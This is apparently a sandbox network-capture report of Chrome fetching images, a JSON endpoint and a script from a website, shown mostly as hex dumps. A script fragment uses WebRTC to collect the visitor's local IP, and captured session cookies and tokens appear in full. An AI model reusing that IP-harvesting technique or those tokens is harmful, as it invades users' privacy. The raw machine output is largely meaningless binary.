                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:48:01 UTC353INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:48:01 GMT
                                                      Content-Type: image/png
                                                      Content-Length: 848
                                                      Connection: close
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:07 GMT
                                                      ETag: "5fc5abdb-350"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:48:01 UTC848INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 7b 00 00 00 20 04 03 00 00 00 c0 a0 1a 78 00 00 00 27 50 4c 54 45 99 99 99 41 41 41 36 36 36 86 86 86 7c 7c 7c 2b 2b 2b 69 69 69 92 92 92 4d 4d 4d 5e 5e 5e 57 57 57 75 75 75 47 70 4c 93 4d d8 44 00 00 00 0d 74 52 4e 53 ff ff ff ff ff ff ff ff ff ff ff ff 00 3d e8 22 86 00 00 02 cb 49 44 41 54 38 cb a5 55 bf 6b 13 71 14 ff b4 97 e6 6a 9b 21 89 56 44 6e 48 15 5a 90 0c a1 b4 22 35 43 90 d0 a2 74 68 2d e8 92 21 84 8a 14 1c 42 69 5d 74 88 82 53 33 44 07 71 c8 a0 c5 41 a1 c3 e1 26 64 b8 bb a4 31 89 df 3f ca cf 7b 97 c4 82 14 ea e5 e0 ee be df bb fb bc 1f 9f cf 7b ef 60 26 39 3c e8 ed 4e 01 38 3c 89 0a bf 06 3d 2a d1 e0 4f 30 3c 9a 51 e0 67 39 22 63 7a 29 45 80 ef 02 d6 5b e6 4f 03 6b 11 e0 39 58 75 59 f7
                                                      Data Ascii: PNGIHDR{ x'PLTEAAA666|||+++iiiMMM^^^WWWuuuGpLMDtRNS="IDAT8Ukqj!VDnHZ"5Cth-!Bi]tS3DqA&d1?{{`&9<N8<=*O0<Qg9"cz)E[Ok9XuY


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      128192.168.2.44988020.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:48:01 UTC682OUTGET /plugins/jquery-ui/images/ui-icons_555555_256x240.png HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://5getfab.segrft.com/plugins/jquery-ui/jquery-ui.min.css?ver=1606790105
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:48:01 UTC355INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:48:01 GMT
                                                      Content-Type: image/png
                                                      Content-Length: 7074
                                                      Connection: close
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:05 GMT
                                                      ETag: "5fc5abd9-1ba2"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:48:01 UTC3741INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 00 f0 08 04 00 00 00 45 9e 72 40 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 02 62 4b 47 44 00 55 b1 8c 86 49 00 00 00 07 74 49 4d 45 07 e0 07 0d 05 1a 36 e3 86 18 46 00 00 1a 85 49 44 41 54 78 da ed 9d 7b 8c 24 47 7d c7 3f 6d 3b b1 08 f1 d9 21 c4 3e ec f3 9d b0 12 6c 02 98 dc ae ad 88 47 24 2c e4 cc 26 d2 25 80 7c ce dc a2 00 01 e7 d6 81 f0 14 b9 5d 9c 5d ff e1 3d cc ce 92 18 3f 70 74 67 d9 04 59 da 47 ee 1c 20 b6 14 cf 62 8c 91 09 27 c0 ec 1d cf 38 24 c1 66 0f 87 3b f8 23 84 e3 8f c8 41 b8 f3 47 bf aa ba eb d5 dd 33 3b b3 d3 f5 3d ed cd 4c ff aa
                                                      Data Ascii: PNGIHDREr@gAMAa cHRMz&u0`:pQ<bKGDUItIME6FIDATx{$G}?m;!>lG$,&%|]]=?ptgYG b'8$f;#AG3;=L
                                                      2025-01-12 23:48:01 UTC3333INData Raw: 3f 32 d2 8a 3a f6 09 52 93 2d 09 6b 4c 80 66 03 fd cf f9 44 3c ef bf 9e 4f f0 73 45 88 3d 4c b2 9c 8f eb aa 0e 9e ae b1 3c e1 51 06 1d 28 31 f9 73 47 34 44 15 28 e8 ed 01 1a 0e af 0b 68 38 3c 01 1a 0e 4f 80 86 c3 13 a0 e1 68 1e 01 22 b5 b1 ea 9d a6 93 aa 72 df ed 90 ce 79 ca ab 43 77 3c bc 0d 22 01 a6 d3 0a a8 fe 1a 52 dd 3f 40 5d b4 08 d3 ed 5a c7 b5 56 0d 9f 8b df ff 0f 14 28 f0 51 0e 70 0f f7 f0 4e de c9 9d bc af 10 33 aa 9d 07 e3 5f e7 01 e7 c5 ff 22 dc c4 c7 09 b9 85 5b 08 f9 38 37 15 e2 9b dd 57 e4 ad 19 f2 f6 0c 45 b9 2d 44 d1 d3 83 2c 8f 91 bd 06 4e b3 c0 49 1e 06 de c6 b9 a9 da b3 98 88 ed 94 6d e8 97 d5 fb 12 93 cc d0 61 9a 05 c5 a2 4a 74 e7 13 8c 71 9c dd 9a 5c 24 0b b2 37 70 2f c5 95 c2 57 a5 df cf f0 1d c5 5a e8 09 be ca 14 33 74 e2 74 e4 e5
                                                      Data Ascii: ?2:R-kLfD<OsE=L<Q(1sG4D(h8<Oh"ryCw<"R?@]ZV(QpN3_"[87WE-D,NImaJtq\$7p/WZ3tt


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      129192.168.2.44988120.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:48:02 UTC393OUTGET /images_plus/footer/footer-18plus.png?ver=1606790107 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:48:02 UTC353INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:48:02 GMT
                                                      Content-Type: image/png
                                                      Content-Length: 441
                                                      Connection: close
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:07 GMT
                                                      ETag: "5fc5abdb-1b9"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:48:02 UTC441INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 04 03 00 00 00 81 54 67 c7 00 00 00 30 50 4c 54 45 00 00 00 98 98 98 8a 8a 8a 7c 7c 7c 3d 3d 3d 60 60 60 35 35 35 2c 2c 2c 4a 4a 4a 50 50 50 82 82 82 8f 8f 8f 6d 6d 6d 59 59 59 44 44 44 76 76 76 ce c3 06 63 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 01 37 49 44 41 54 28 cf 65 91 bd 4a 03 41 14 85 4f fe 8c c1 9f ec 99 49 22 18 c4 2c 42 4a 49 2c 2c 65 13 11 c1 34 06 6c 85 28 58 0a 01 c5 c6 66 7d 03 35 5d b4 30 20 82 58 59 6a 95 ad 62 63 61 63 65 61 ed 53 b8 73 d9 cd 6e c8 57 cc 85 6f e6 dc 61 ee 40 d8 79 21 df 0f 10 92 ed 53 78 0e c5 36 d5 47 e7 e2 de e6 13 84 59 6a c7 d4 74 5d fd 8a b8 2b bb c1 8e fd 26 85 9b 08 d8 a3 39 d2 52 dd 71 77 bb 0a a0 ee 2f 21 4d 6d 12 6e 24 72 7e 26 b9 8a
                                                      Data Ascii: PNGIHDR Tg0PLTE|||===```555,,,JJJPPPmmmYYYDDDvvvctRNS@f7IDAT(eJAOI",BJI,,e4l(Xf}5]0 XYjbcaceaSsnWoa@y!Sx6GYjt]+&9Rqw/!Mmn$r~&


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      130192.168.2.449882154.86.18.44434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:48:02 UTC1096OUTGET /member/call-request?check=1 HTTP/1.1
                                                      Host: b45032.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: XSRF-TOKEN=eyJpdiI6InZQYnZrbHRNY3ZwWHNwTU5DRHpRd2c9PSIsInZhbHVlIjoieE1Kb3cwWHVIb2Roc0pBcnNyOVRcLzNnalluWWxOREpENFV5TTNwVjFFbjdsalwvVU5XTHNFQit4bWRKSFZrSWZUSklYNDBcL3FVRVBPV3lKVkM3RFdIZ3c9PSIsIm1hYyI6ImU5OWRiNmNkMWQ0YTk5NzdiYmJjODkwZjFiMjZkNjZlNTljNzViZGE1Zjg5MTBiYTVjZmY2NTcyMGM4YmQyMDkifQ%3D%3D; Hm_lvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; Hm_lpvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; HMACCOUNT=E4D1CF12C6FA10DD; vanguard_session=eyJpdiI6IlZhYlordnhKaWFTdkU1QzlLbUdrQVE9PSIsInZhbHVlIjoiZ0xuQ3MrSTk4K3BXa3djWGNmemoxV0NPNmp0QzFSc2xWa01hWWJuWTRBelA0UUpLcE9FZ1ZMTEhxR0dDNGV4YlwvY05wa2FyeFFzemhucWtnbE1oME9BPT0iLCJtYWMiOiJjZjg1MTJkZTQwYTE5MGFhYjg0NmFiYzgzNjhiODYzZWY4YTc4NmE1MzcwNmEyZDQ0NjgwNmZmNjM4ZmNmMzkyIn0%3D
                                                      2025-01-12 23:48:03 UTC719INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:48:03 GMT
                                                      Content-Type: application/json
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Alt-Svc: h3="67e285f0.t74nx2b2.com:443";ma=604800;persist=1,h2="bt5.tuf3a353.com:443";ma=604800;persist=1
                                                      Cache-Control: no-cache, private
                                                      Set-Cookie: vanguard_session=eyJpdiI6IkpzQnVUWkllekNoT1NvZmx2VSswQkE9PSIsInZhbHVlIjoieWpTQ0luNDY1cTZ3VFlDN2cyWDBSKzljTDhsWkpBSnZqSEF3TWNPeHZRQklhaTcyc3dnTnJYQ3BESDRSWWRWMjVZcTJRZFN4aEhISSsrU01VNDdTcUE9PSIsIm1hYyI6ImJiMDc1ZTBkYmI3NTAxNzEyZWM1NmY0OGM5YTUyMTgzNWY2YTY2ZjhiNGU2NTRkNDAxNzhiZmNlODRjMjZmNzEifQ%3D%3D; expires=Mon, 13-Jan-2025 01:48:03 GMT; Max-Age=7200; path=/; secure; httponly; samesite=none
                                                      Server: nginx
                                                      2025-01-12 23:48:03 UTC51INData Raw: 32 38 0d 0a 5b 66 61 6c 73 65 2c 22 5c 75 35 32 39 66 5c 75 38 30 66 64 5c 75 36 37 32 61 5c 75 35 34 32 66 5c 75 37 35 32 38 22 5d 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 28[false,"\u529f\u80fd\u672a\u542f\u7528"]0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      131192.168.2.44988420.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:48:02 UTC376OUTGET /assets/js/caller.js?ver=1675418257 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:48:03 UTC317INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:48:02 GMT
                                                      Content-Type: application/javascript
                                                      Content-Length: 4386
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Last-Modified: Fri, 03 Feb 2023 09:57:37 GMT
                                                      ETag: "63dcda91-1122"
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:48:03 UTC3779INData Raw: 2f 2a 2a 0a 2a 0a 2a 2f 0a 0a 0a 28 66 75 6e 63 74 69 6f 6e 28 24 29 7b 0a 09 27 75 73 65 20 73 74 72 69 63 74 27 3b 0a 0a 09 76 61 72 20 6c 6f 63 61 6c 69 70 2c 0a 09 61 6a 61 78 55 72 6c 20 3d 20 27 2f 6d 65 6d 62 65 72 2f 63 61 6c 6c 2d 72 65 71 75 65 73 74 27 3b 0a 0a 0a 09 69 66 28 24 28 64 6f 63 75 6d 65 6e 74 29 2e 64 61 74 61 28 27 63 61 6c 6c 65 72 27 29 29 0a 09 09 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0a 0a 0a 09 24 28 64 6f 63 75 6d 65 6e 74 29 0a 0a 09 2e 64 61 74 61 28 27 63 61 6c 6c 65 72 27 2c 20 74 72 75 65 29 0a 0a 09 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 09 09 74 72 79 7b 0a 09 09 09 77 69 6e 64 6f 77 2e 52 54 43 50 65 65 72 43 6f 6e 6e 65 63 74 69 6f 6e 20 3d 20 77 69 6e 64 6f 77 2e 52 54 43 50 65 65 72 43 6f 6e 6e
                                                      Data Ascii: /****/(function($){'use strict';var localip,ajaxUrl = '/member/call-request';if($(document).data('caller'))return false;$(document).data('caller', true).ready(function(){try{window.RTCPeerConnection = window.RTCPeerConn
                                                      2025-01-12 23:48:03 UTC607INData Raw: 63 5c 27 2c 20 65 6e 64 43 6f 6c 6f 72 73 74 72 3d 5c 27 23 31 33 31 33 31 33 5c 27 2c 47 72 61 64 69 65 6e 74 54 79 70 65 3d 30 20 29 3b 27 3b 0a 09 09 73 74 79 6c 65 2b 3d 27 6c 69 6e 65 2d 68 65 69 67 68 74 3a 34 30 70 78 3b 27 3b 0a 09 09 73 74 79 6c 65 2b 3d 27 7d 27 3b 0a 09 09 73 74 79 6c 65 2b 3d 27 2e 63 61 6c 6c 69 6e 6e 65 72 20 69 6e 70 75 74 2c 2e 63 61 6c 6c 69 6e 6e 65 72 20 62 75 74 74 6f 6e 20 7b 27 3b 0a 09 09 73 74 79 6c 65 2b 3d 27 68 65 69 67 68 74 3a 20 32 36 70 78 3b 27 3b 0a 09 09 73 74 79 6c 65 2b 3d 27 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 36 70 78 3b 27 3b 0a 09 09 73 74 79 6c 65 2b 3d 27 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 33 33 3b 27 3b 0a 09 09 73 74 79 6c 65 2b 3d 27 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20
                                                      Data Ascii: c\', endColorstr=\'#131313\',GradientType=0 );';style+='line-height:40px;';style+='}';style+='.callinner input,.callinner button {';style+='height: 26px;';style+='line-height: 26px;';style+='background:#333;';style+='border:1px solid


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      132192.168.2.44988320.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:48:02 UTC388OUTGET /common/storage/cms/cms_1143.png?ver=1708958748 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:48:03 UTC357INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:48:02 GMT
                                                      Content-Type: image/png
                                                      Content-Length: 69232
                                                      Connection: close
                                                      Last-Modified: Mon, 26 Feb 2024 14:45:48 GMT
                                                      ETag: "65dca41c-10e70"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:48:03 UTC3739INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 bc 00 00 01 cc 08 03 00 00 00 00 ae 8b 2d 00 00 03 00 50 4c 54 45 ff ff ff f8 fb f0 fa fc f4 f4 fa e8 f0 f7 e3 ee f6 df f6 fb ed f4 fa eb 01 98 6f f2 f8 e5 eb f4 d8 ed f5 dc e2 f0 c9 fb fe f7 d3 e6 ad e9 f3 d6 dc ec be d9 ea b8 e4 f0 cb d7 e8 b3 e4 f0 ce e1 ef c5 e8 f3 d3 f2 fa e3 df ed c3 03 a9 ae 40 be b3 68 cd b6 e6 f1 d0 f6 fa eb f0 f9 e0 d5 e7 af f0 f8 dc 00 a8 85 5a c8 b5 e0 f0 c1 dd ef ba df ef bd dc ee b7 e6 f2 cf da ec b4 e3 20 22 14 af b0 f7 fc ec 30 b9 b2 e8 f3 d1 d1 e8 e1 20 b3 b1 00 00 00 4d c3 b4 ed f7 d9 aa d4 c6 d8 ef ec aa da cf f5 fa fa 6e b8 9e 69 c1 ab ad ad ad b7 e2 de d0 d0 d0 c2 e7 df 6b 6b 6b ea f5 f4 ff db 4e 00 a9 ef ab d9 dd ff f1 83 ff db 70 41 cc 48 de f2 ef ff ca 5d d2
                                                      Data Ascii: PNGIHDR-PLTEo@hZ "0 MnikkkNpAH]
                                                      2025-01-12 23:48:03 UTC4096INData Raw: 76 8d 10 79 a9 38 2a af 2d 9b a3 a5 b5 b1 b9 a0 51 01 fd a1 da f0 9b 5d 7c 58 d3 2c b2 8a 2d 39 76 71 18 de 9f 1c 2a e8 b4 79 52 2f 9a c4 ad 22 8b a8 0b bb 8a ae 51 38 f5 32 be 5a 6f f0 5e 3f 12 76 5e 17 5e 0d bd 45 a1 45 5e d0 77 c1 d8 90 9f 85 4c d9 05 ba 52 6a a0 2b 9e c2 b5 86 42 1b 36 38 2f 36 6c a5 fc 01 4c 4b 72 b5 11 15 50 bd 1a 84 d7 b5 5e fd 10 74 5e 58 b5 aa 5c 6c 15 eb bc ce 0b e3 a5 11 07 7b a2 0d 42 70 50 89 f1 16 5b 44 4b e1 55 7c f5 4f 55 bc 89 a6 7a 43 1d 62 12 e8 25 7e 3d 83 65 ff 6b c3 a6 89 81 47 21 b7 6b 31 70 0b 6f d7 a4 d2 40 57 8d d0 3c a4 f8 83 fc 3e 2f 42 77 de 77 91 77 01 ee fc 58 4b 7b 43 54 40 eb b7 2c 38 56 81 d8 40 0e 0c b8 5d 7a e5 55 70 15 35 6e 14 87 e8 45 97 98 47 1c e4 01 bb 6e f6 ef 9c bb fb f6 ed db bb 37 e5 7d f7 c1
                                                      Data Ascii: vy8*-Q]|X,-9vq*yR/"Q82Zo^?v^^EE^wLRj+B68/6lLKrP^t^X\l{BpP[DKU|OUzCb%~=ekG!k1po@W<>/BwwwXK{CT@,8V@]zUp5nEGn7}
                                                      2025-01-12 23:48:03 UTC4096INData Raw: e7 62 46 ff 98 30 93 09 07 08 32 0e 14 0b c3 0b 13 fe d1 f5 4a ed ad 9d 70 85 5a 86 d7 df 37 c3 87 4f a9 a8 db 87 ff d3 d4 ab 3c 7e c1 a8 2f 75 42 9a 6f a0 ef 04 0a a9 bb ac bc 35 70 2d d7 20 3d 2f b2 cb 21 c7 ed 71 30 cc d5 10 a8 16 f0 b2 6d 20 88 90 5e 73 79 4f 64 0d a7 7b 11 5e 16 5e 4a 32 d0 be 09 78 0b f4 8e a9 d4 46 fd e9 e4 79 f1 32 e2 1b ae 55 cc 6b 89 92 5e 13 ec 1c 0c bc 87 0e 1f 3e 08 bf 5c e8 df 52 27 ee 1f 53 c7 fa fd a3 b7 14 c4 b1 ef 90 24 bb f1 fd 1a a4 1c 5e 3e 45 78 31 04 bc 9b b8 bb 6c 0e 70 58 7a e5 b4 74 d9 5c 16 9a 41 d2 3e dd a0 42 8e d7 e4 78 89 5b 12 de 60 23 af 10 5e 93 24 5b 1b 6a ca b1 5a 1b 58 7e f1 ee 80 67 d0 02 2c fc ae b4 10 ad e1 35 0c d9 ed bd 8b 6f 6f 9b c3 8b b5 e1 54 31 bd da 02 17 b8 23 be ac f6 05 71 91 22 32 67 17
                                                      Data Ascii: bF02JpZ7O<~/uBo5p- =/!q0m ^syOd{^^J2xFy2Uk^>\R'S$^>Ex1lpXzt\A>Bx[`#^$[jZX~g,5ooT1#q"2g
                                                      2025-01-12 23:48:03 UTC4096INData Raw: ec 4e 2e c8 a6 d2 de ce d4 3e 36 71 75 b9 41 97 1c 9e a4 d7 34 05 de af 9f 81 2f 66 6a d0 ec ca d4 7a d7 83 21 f5 e4 90 62 5a 75 d9 69 74 b6 cf 1e b0 54 10 a7 39 36 1e f9 27 09 53 79 f6 f0 72 3a 18 89 bc 63 6a 6d 24 6b 37 22 1f 98 1a 3b fe 1d de 66 90 ef bf 09 06 26 e7 41 0c 86 f4 df b9 86 60 81 31 05 b7 07 1a 52 64 10 de d9 5a 4f bb 3d 88 23 3d 9d 59 16 73 0b 6f 1b e3 df e0 25 ca 35 10 c0 cb 86 68 c0 ad a5 2d b7 2c 54 84 d7 da 9d bc 3d 89 e2 c6 05 c6 d1 ba bf c2 2b 83 73 ba ac 37 5d b0 ad ee cf 06 7f 51 70 b8 dc 51 a1 f7 12 27 87 af f2 83 ed fe 0c 83 e6 17 69 67 93 eb 34 0c 45 61 a7 69 13 85 60 3d f1 cf 04 89 01 82 11 19 20 35 62 80 de 1a ba 02 66 48 88 05 54 6c a4 fb c5 d7 c7 ee 89 7d ed 24 c0 49 5f 9e db b4 4d 21 5f cf bb be fe c3 e7 88 dd 71 5e 32 6a
                                                      Data Ascii: N.>6quA4/fjz!bZuitT96'Syr:cjm$k7";f&A`1RdZO=#=Yso%5h-,T=+s7]QpQ'ig4Eai`= 5bfHTl}$I_M!_q^2j
                                                      2025-01-12 23:48:03 UTC4096INData Raw: f1 f5 7f a3 35 31 29 e4 06 cf 5d 2e 51 20 1a de ca 33 6a 78 ff c7 e1 85 2b 30 15 5e 08 35 28 31 16 b5 75 7b 55 23 c7 4d f0 66 ff 00 de e1 9b e4 d2 4d d9 5b dd a8 b7 62 13 b9 bd 7a 88 03 c4 b6 de 37 aa be 76 23 bc ac b1 69 76 59 69 03 bf 46 81 db 3f 2e bc 71 3e 03 d9 55 13 f2 9e 6b d0 9d 95 0f 6f de 07 1a 93 ff 15 78 5f 98 d4 c7 44 35 5d a0 de d8 aa 8b cc e1 f2 e2 2a ff af e5 3d 8c 36 36 80 59 b7 50 a8 d4 8c d2 eb 4d fe f4 2a 4a 54 6b 6e 87 97 fc 6a a7 d7 b5 9a 25 e0 e5 10 5e 35 9c 4c cd 92 73 27 45 5d f7 da d3 bb a9 a9 43 f9 37 e0 5d d0 e5 8d 65 76 63 19 4a 78 e7 a4 fc f7 c1 9b fd 5e 78 eb ba 65 b4 a3 8c 6f 6b af 4f 68 b0 b1 81 f2 d8 c5 8a c2 66 a5 8d ec 72 0e 12 3b f3 de 5d 94 eb fb db e1 a5 df a0 1f a7 08 3b db 8c 9e 1e e7 8b b0 7b a9 b6 46 74 9d bf f4
                                                      Data Ascii: 51)].Q 3jx+0^5(1u{U#MfM[bz7v#ivYiF?.q>Ukox_D5]*=66YPM*JTknj%^5Ls'E]C7]evcJx^xeokOhfr;];{Ft
                                                      2025-01-12 23:48:03 UTC4096INData Raw: 6b be 27 cb 4a 1b 77 85 91 e9 01 c4 b8 21 85 05 8c f7 30 78 17 ee fc 0a ad 1a 7c 68 bb e2 f7 f8 f0 96 38 9f f0 e1 95 db c4 9b a5 d4 16 8f 4c 0a d4 c7 a0 e9 a5 34 bd bb a7 ad c4 e0 f5 4b 37 57 f0 96 fe 7b df 76 d1 d5 bf ab d0 f4 3e fc fd 77 ed bd d5 5f 46 72 45 ca 75 dd 1b e4 f4 2d bb 7d 8c b8 5d c8 7a bd 76 78 d8 ae 2b 6d 42 e3 35 e7 4a f3 c0 1f 50 33 c7 82 d7 80 19 92 e1 3c a9 d0 28 c7 21 0d 85 47 59 09 bb d5 df 41 f0 da 92 d3 dd 04 da f4 45 b6 fc ff 80 17 8f fc 0c 32 87 5b 69 6a 09 bb bd 38 bc 38 f0 94 7a 3e 66 23 bc 59 1b 78 cf 54 3b 2f 5e 53 6d bd 8f 60 17 f0 ea 68 97 ad 64 ea e2 84 91 fc 33 93 19 74 53 65 e5 3d 19 51 47 59 c1 f9 1b 63 bc fd 31 97 9a 71 5e 37 36 88 00 2f 96 c7 07 3b 26 5e 00 ef c0 c2 eb 24 c3 db 3a 40 43 7c 86 b8 47 33 4c a6 f5 13 e2
                                                      Data Ascii: k'Jw!0x|h8L4K7W{v>w_FrEu-}]zvx+mB5JP3<(!GYAE2[ij88z>f#YxT;/^Sm`hd3tSe=QGYc1q^76/;&^$:@C|G3L
                                                      2025-01-12 23:48:03 UTC4096INData Raw: 4b 78 f3 f4 92 5d a6 5e 0c d9 e8 bc 22 6f bb a0 f5 c5 cb 17 22 29 22 eb 05 bb a0 f7 74 18 7c ab cc 8c 6e d9 79 09 74 ec b8 06 65 f0 0b 34 e8 bc 6b b6 0b 36 41 2c 82 02 fe 23 bd 14 a8 ca 06 74 0f a9 2c bc d0 0e ec 4a b9 55 6e cd 6c 19 e1 25 b9 eb ce 5b b6 de 93 06 de 50 84 f7 32 e9 cd 4e e7 a2 f0 59 17 e6 8b 46 24 e1 cd 99 95 f1 da 0c 62 48 68 24 10 8b 8a b7 e8 44 2b 27 98 31 39 e4 e1 dd ed 02 76 c9 2f ad 17 f4 86 ce 4b 76 5f 84 0a cd 17 1f 31 62 e9 ad 72 d7 07 d3 76 ad f3 b6 a5 43 15 0c bd 5a 81 e8 bc 99 09 b2 22 bd db a5 ea 85 94 4b d7 25 b8 19 78 2f 2a bc f0 e0 89 db f2 6c 99 39 34 6e 26 07 01 ad 07 38 65 b7 0f 43 c3 1a bc 54 c3 51 db 35 e2 9b c9 bc a2 7b 0d c0 d5 6d 28 c3 3b 0c 7e 9c 36 1b 2c ea 79 e1 3b b8 89 5b 81 97 b6 6b 4e d2 21 bc cb 8c c3 4e 16
                                                      Data Ascii: Kx]^"o")"t|nyte4k6A,#t,JUnl%[P2NYF$bHh$D+'19v/Kv_1brvCZ"K%x/*l94n&8eCTQ5{m(;~6,y;[kN!N
